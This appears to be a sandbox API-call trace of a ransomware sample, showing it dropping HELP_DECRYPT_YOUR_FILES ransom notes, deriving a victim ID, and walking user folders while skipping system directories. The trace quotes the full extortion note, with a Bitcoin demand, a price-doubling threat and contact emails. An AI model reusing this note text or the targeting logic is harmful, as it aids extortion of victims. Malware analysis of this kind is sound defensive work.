	[0180.891] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Public\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT") returned 50
	[0180.891] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\videos\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.893] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.893] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.895] CloseHandle (hObject=0x380) returned 1
	[0180.895] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.896] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.896] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.897] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.897] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\videos\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.897] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.897] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.898] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.898] CloseHandle (hObject=0x380) returned 1
	[0180.898] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.898] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.899] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.899] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Public\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML") returned 51
	[0180.899] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\videos\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.901] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.901] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.903] CloseHandle (hObject=0x380) returned 1
	[0180.904] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.904] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.905] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.905] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.906] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.906] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\videos\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.906] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.906] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.906] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.907] CloseHandle (hObject=0x380) returned 1
	[0180.908] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*.*" (normalized: "c:\\users\\public\\videos\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x853ba621, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x853ba621, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0180.908] lstrlenW (lpString="C:\\Users\\Public\\Videos\\*.*") returned 26
	[0180.908] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.909] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Videos\\*.*", cchLength=0x1a | out: lpsz="c:\\users\\public\\videos\\*.*") returned 0x1a
	[0180.909] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.909] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="windows") returned 0x0
	[0180.909] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.909] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="boot") returned 0x0
	[0180.909] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.910] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="system volume information") returned 0x0
	[0180.910] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.910] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.910] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.910] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="temp") returned 0x0
	[0180.910] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.910] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="program files") returned 0x0
	[0180.911] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.911] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.911] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.911] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="appdata") returned 0x0
	[0180.911] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.911] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="application data") returned 0x0
	[0180.911] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.912] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="winnt") returned 0x0
	[0180.912] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.912] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="tmp") returned 0x0
	[0180.912] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.912] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="cache") returned 0x0
	[0180.912] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.912] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.913] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.913] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="webcache") returned 0x0
	[0180.913] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.913] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="inetcache") returned 0x0
	[0180.913] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.913] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="nvidia") returned 0x0
	[0180.913] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.914] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="packages") returned 0x0
	[0180.914] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.914] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="cookies") returned 0x0
	[0180.914] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.914] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="programdata") returned 0x0
	[0180.914] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0180.914] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0180.914] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x853ba621, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x853ba621, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.915] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0180.915] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.915] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x853ba621, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x853ba621, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x855d062f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.915] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8539432d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8539432d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x855aa557, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.915] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8539432d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8539432d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x855aa557, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.915] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0180.915] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0180.916] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0
	[0180.916] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0180.916] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0180.917] FindNextFileW (in: hFindFile=0xfb9930, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 1
	[0180.917] lstrcmpW (lpString1="RDhJ0CNFevzX", lpString2="..") returned 1
	[0180.917] lstrcmpW (lpString1="RDhJ0CNFevzX", lpString2=".") returned 1
	[0180.917] lstrcpyW (in: lpString1=0x18dcbc, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users"
	[0180.917] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\"
	[0180.917] lstrcatW (in: lpString1="C:\\Users\\", lpString2="RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0180.917] lstrcpyW (in: lpString1=0x18d1b4, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0180.918] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0180.918] lstrcpyW (in: lpString1=0x18cda4, lpString2="C:\\Users\\RDhJ0CNFevzX\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0180.918] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\*.*"
	[0180.918] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\*.*"), lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0180.918] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\*.*") returned 25
	[0180.918] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.919] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\*.*", cchLength=0x19 | out: lpsz="c:\\users\\rdhj0cnfevzx\\*.*") returned 0x19
	[0180.919] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.919] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="windows") returned 0x0
	[0180.919] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.919] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="boot") returned 0x0
	[0180.919] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.919] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="system volume information") returned 0x0
	[0180.920] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.920] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.920] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.920] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="temp") returned 0x0
	[0180.920] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.920] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="program files") returned 0x0
	[0180.920] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.921] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.921] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.921] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="appdata") returned 0x0
	[0180.921] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.921] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="application data") returned 0x0
	[0180.921] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.921] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="winnt") returned 0x0
	[0180.922] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.922] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="tmp") returned 0x0
	[0180.922] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.922] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="cache") returned 0x0
	[0180.922] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.933] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.933] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.934] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="webcache") returned 0x0
	[0180.934] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.934] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="inetcache") returned 0x0
	[0180.934] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.934] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="nvidia") returned 0x0
	[0180.934] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.934] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="packages") returned 0x0
	[0180.935] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.935] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="cookies") returned 0x0
	[0180.935] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.935] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="programdata") returned 0x0
	[0180.935] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.935] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1
	[0180.936] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1
	[0180.936] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1
	[0180.936] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1
	[0180.936] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58b39580, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x58b39580, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1
